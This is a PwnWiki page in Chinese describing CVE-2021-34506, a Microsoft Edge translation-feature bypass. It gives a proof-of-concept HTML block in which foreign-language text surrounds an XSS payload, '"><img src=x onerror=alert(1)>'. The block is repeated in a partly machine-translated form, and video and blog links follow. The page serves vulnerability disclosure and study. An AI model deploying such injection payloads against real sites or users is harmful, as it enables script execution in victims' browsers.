CVE-2021–34506 Microsoft Edge 安全功能繞過漏洞

From PwnWiki
Other languages:
Chinese

漏洞影響

Microsoft Edge < 91.0.864.59

POC

<b><u>SOME TEXT IN DIFFERENT LANGUAGE </u></b>
<br>

Políticas de Privacidade
Usaremos seus dados pessoais para resolver disputas, solucionar problemas e aplicar nossos Termos e Condições de Uso.

<br>

Para prevenir abusos no app/site, o Badoo usa decisões automáticas e moderadores para bloquear contas, como parte de seu procedimento de moderação. Para isso, nós conferimos contas e mensagens para encontrar conteúdo que indicam quebra dos nossos Termos e Condições de Uso. Isso é feito através de uma




<b><u>OUR PAYLOAD IN TEXT FORM </u></b>
<br>
<br>



"><img src=x onerror=alert(1)>





<br>
<br>
<br>
Políticas de Privacidade
Usaremos seus dados pessoais para resolver disputas, solucionar problemas e aplicar nossos Termos e Condições de Uso.一些不同語言的文字</u></b>
 <br>

 隱私政策
 我們將使用您的個人數據來解決爭議、解決問題並應用我們的使用條款和條件。

 <br>

 為了防止應用程序/網站濫用,Badoo 使用自動決策和版主來阻止帳戶作為其審核程序的一部分。  為此,我們會檢查帳戶和消息以查找表明違反我們的使用條款和條件的內容。這是通過




 <b><u>我們的文本形式的有效載荷</u></b>
 <br>
 <br>



 "><img src=x onerror=alert(1)>





 <br>
 <br>
 <br>
 隱私政策
 我們將使用您的個人數據來解決爭議、解決問題並應用我們的使用條款和條件。


視頻


https://youtu.be/XfTN7fPtB1s

https://youtu.be/tTEethBKkRc

https://youtu.be/2ogwUdszDsY

參考

https://cyberxplore.medium.com/how-we-are-able-to-hack-any-company-by-sending-message-including-facebook-google-microsoft-b7773626e447

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021–34506_Microsoft_Edge_安全功能繞過漏洞&oldid=5982"